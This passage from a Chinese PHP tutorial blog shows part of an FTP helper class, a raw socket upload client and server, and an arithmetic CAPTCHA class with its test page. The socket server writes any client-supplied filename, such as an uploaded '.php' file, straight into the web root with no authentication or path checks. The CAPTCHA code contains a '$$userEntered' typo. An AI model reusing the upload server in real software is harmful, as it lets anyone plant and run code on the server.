$this->getList("$dir/$value",$all,$isforeach);
}else{
$result[] = $value;
}
}
return $result;
}
/**
*获取操作系统类型
*/
function getSystype() {
return ftp_systype($this->conn);
}
/**
*获取文件大小
*@param $remote_file
*/
function getFilesize($remote_file) {
return ftp_size($this->conn,$remote_file);
}
/**
*获取文件最后修改时间
*@param $remote_file
*/
function getFilemdtm($remote_file) {
return ftp_mdtm($this->conn,$remote_file);
}
/**
*改变文件属性
*@param $filename
*@param $mode
*/
function setChmod($filename,$mode) {
if(function_exists('ftp_chmod')) {ftp_chmod($this->conn,$mode,$filename) or die("更改属性失败！");}
else{return $this->setSite('CHMOD '.$mode.' '.$filename);}
}
/**
*向服务器发送SITE命令
*@param $cmd
*/
function setSite($cmd) {
ftp_site($this->conn,$cmd) or die("发送命令失败！");
}
/**
*请求运行一条FTP命令
*@param $cmd
*/
function setExec($cmd) {
ftp_exec($this->conn,$cmd) or die("发送失败！");
}
/**
*获取当前目录
*/
function getPwd() {
return ftp_pwd($this->conn);
}
/**
*返回上级目录
*/
function setCdup() {
ftp_cdup($this->conn);
}
/**
*切换到指定目录
*@param $dir
*/
function setChdir($dir) {
ftp_chdir($this->conn,$dir) or die("不能改变目录！");
}
/**
*创建一个树目录
*@param $path
*@return 目录名
*/
function setMkdir($path) {
$path_arr = explode('/',$path); // 取目录数组
$file_name = array_pop($path_arr); // 弹出文件名
$path_div = count($path_arr); // 取层数
foreach($path_arr as $val) // 创建目录
{
if(@ftp_chdir($this->conn,$val) == FALSE){
@ftp_mkdir($this->conn,$val) or die("目录创建失败,请检查权限及路径是否正确！");
@ftp_chdir($this->conn,$val);
}
}
for($i=1;$i<=$path_div;$i++) // 回退到根
{
@ftp_cdup($this->conn);
}
}
/**
*删除一个目录
*@param $dir
*/
function setRmdir($dir) {
ftp_rmdir($this->conn,$dir) or die("删除失败!,请检查权限！");
}
/**
*重命名一个文件或目录|||||||||可以用作移动作用
*@param $from
*@param $to
*/
function setRename($from,$to,$exists = true) {
if(!$exists) $this->setMkdir($to);
ftp_rename($this->conn,$from,$to) or die("重命名失败！请检查权限！");
}
/**
*删除一个文件
*@param $filename
*/
function setDelete($path) {
ftp_delete($this->conn,$path) or die("删除文件失败！请检查权限！");
}
/**
*ftp文件上传
*@param $remote
*@param $local
*@param $mode
*@param $exists
*/
function filePut($remote,$local,$mode = FTP_BINARY,$exists = true) {
if(!$exists) $this->setMkdir($remote);//目录不存在则创建
return ftp_put($this->conn,$remote,$local,$mode);
}
/**
*ftp文件下载
*@param $remote
*@param $local
*@param $mode
*/
function fileGet($remote,$local,$mode = FTP_BINARY) {
return ftp_get($this->conn,$local,$remote,$mode);
}
/**
*打开被动模式
*@param $pasv
*/
function setPasv($pasv) {
ftp_pasv($this->conn,$pasv) or die("打开被动模式失败！");
}
/**
*关闭连接句柄
*/
function closeFtp() {
ftp_close($this->conn) or die("不能关闭！");
}
}//End Class
?>

以上只是说明如何实现图片和WEB分离的原理。在实际开发中，还要进行如：上传检测，水印，缩略图生成，冗余判断，延时间操作，图片路径记录等操作。但只要明白了原理其它的应该不在话下了吧：）

使用socket上传
客户端：

$fp = fsockopen("192.168.0.119", 1337, $errno, $errstr, 30);
if (!$fp) {
echo "$errstr ($errno)
\n";
} else {
$str = "filename:aajsad.php";
fwrite($fp, $str);
fwrite($fp, 'data:');
$out = file_get_contents('jsad.php');
fwrite($fp, $out);
fwrite($fp,'dataend');
}
fclose($fp);
?>

服务端：

set_time_limit(0);
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($socket,'192.168.0.119',1337);
socket_listen($socket,5);
$path = "e:\\web\\";
while (true)
{
$connection = socket_accept($socket);
if($connection)
{
$BufferPond = array();
$buffer = '';
while($flag = socket_recv($connection, $buffer, 1024, 0))
{
if($buffer == 'NO DATA')
{
break;
}
if (false !== strpos($buffer,'filename:'))
{
$filename = substr($buffer,9);
$filename = $path.$filename;
$fp = fopen($filename,"wb");
continue;
}
if ($buffer == 'data:')
{
continue;
}
if ($buffer == 'dataend')
{
break;
}
fwrite($fp,$buffer);
fclose($fp);
}
socket_close($connection);
}
}
socket_close($socket);
?>

curl基本基于socket的，原理同上。

AJAX、FLASH跨域上传
这方面不熟，就不说了

关于PHP算术运算验证码的研究

花太香齐 — Mon, 18 May 2009 14:31:00 +0000

最近2天在研究验证码，看了很多，不外乎图片，语音，算术，token验证（PHP无码验证机制），其中当算图片的用户体验最不好了，最少都要输入4个字母，有的更多，目的不外乎是为了防止垃圾留言等。今天为大家推荐一个算术验证的机制，类库是国外的人写的，挺不错的，基本可以放弃图片验证了。而且不依赖cookie和session。转载请注明来自www.ieliwb.com

math类库(mathcheck.class.php)：英语比较烂，只简单的注明功能

/*
Author: Michael Woehrer
Author URI: http://sw-guide.de/
Version: 1.1
*/
class MathCheck {
var $opt; // array containing the options
var $info; // containing information
/**
* MathCheck
*/
function MathCheck() {
$this->opt = array(
'unique' => 'LnfvpVZmsSCfLf0WxXN0',
'input_numbers' => '1~1, 2~2, 3~3, 4~4, 5~5, 6~6, 7~7, 8~8, 9~9, 10~10',
);
}
/**
* GenerateValues 创建算术分子
*/
function GenerateValues() {
$num_array = $this->auxNoToArray($this->opt['input_numbers']);
$rand_keys = array_rand($num_array, 2);
$this->info['operand1'] = $num_array[$rand_keys[0]];
$this->info['operand2'] = $num_array[$rand_keys[1]];
$this->info['result'] = $this->auxGenerateHash($rand_keys[0] + $rand_keys[1], date(j));
}
/**
* InputValidation 验证计算结果
* Input validation. Returns an empty string if validation passed or an error string if not passed.
*/
function InputValidation($actualResult, $userEntered) {
$error = '';
// Case 1: User has not entered an answer at all:
if ($error == '' && $userEntered == '') {
$error = 'No answer';
}
$userEntered = preg_replace('/[^0-9]/', '', $userEntered); // Remove everything except numbers
if ($error == '' && $actualResult != $this->auxGenerateHash($userEntered, date(j)) ) {
if ( ( date('G') <= 1 ) AND ( $actualResult == $this->auxGenerateHash($$userEntered, (intval(date(j))-1) ) ) ) {
// User has just passed midnight while writing the comment. We consider
// the time between 0:00 and 1:59 still as the day before to avoid
// error messages if user visited page on 23:50 but pressed the "Submit Comment"
// button on 0:15.
} else {
$error = 'Wrong answer';
}
}
return $error;
}
/***
* auxNoToArray 根据自定义字符串获取算子
* Converts the input string, e.g. "1~one, 2~two, 3~three, 4~four, ..."
* into an array, e.g.: Array([1] => one, [2] => two, [3] => three, ...)
*/
function auxNoToArray($input) {
$input = str_replace(' ', '', $input); // Strip whitespace
$sourcearray = explode(',', $input); // Create array
foreach ($sourcearray as $loopval) {
$temparr = explode('~', $loopval);
$targetarray[$temparr[0]] = $temparr[1];
}
return $targetarray;
}
/***
* auxGenerateHash 加密结果
* Generate hash
*/
function auxGenerateHash($inputstring, $day) {
// Adds the file modification time of this file
$inputstring .= filemtime(__FILE__);
// Adds a unique value defined in the options
$inputstring .= $this->opt['unique'];
// Add the IP address of the server under which the current script is executing.
$inputstring .= getenv('SERVER_ADDR');
// Add date
$inputstring .= $day . date('ny');
// Get MD5 and reverse it
$enc = strrev(md5($inputstring));
// Get only a few chars out of the string
$enc = substr($enc, 28, 1) . substr($enc, 9, 1) . substr($enc, 21, 1) . substr($enc, 15, 1) . substr($enc, 7, 1);
// Return result
return $enc;
}
}
?>

测试文件mathcheck.php:

include_once('./mathcheck.class.php');
$MathCheckObj = new MathCheck;
$mc = math_create();
if($_POST['user_entered'])
{
var_dump($_POST);
math_check();
}
/***********************
* 获取数学问题和答案
***********************/
function math_create()
{
global $MathCheckObj;
$MathCheckObj->GenerateValues();
$mc_info['operand1'] = $MathCheckObj->info['operand1'];
$mc_info['operand2'] = $MathCheckObj->info['operand2'];
$mc_info['result'] = $MathCheckObj->info['result'];
return $mc_info;
}
/***************
* 验证回答结果
***************/
function math_check() {
global $MathCheckObj;
$actual_result = $_POST['actual_result'];
$user_entered = $_POST['user_entered'];
$result = $MathCheckObj->InputValidation($actual_result, $user_entered);
switch ($result) {
case 'No answer':
die("请回答问题,终止下面的程序");
break;
case 'Wrong answer':
die("问题回答错误,终止下面的程序");
break;
}
echo '问题回答正确,可以继续了';
}
?>
测试
请回答计算结果： echo $mc['operand1'] . ' + ' . $mc['operand2'] . ' ?' ?>
echo $mc['result']; ?>" />

如果需要静态化验证，建议采用json构造。代码就不写了。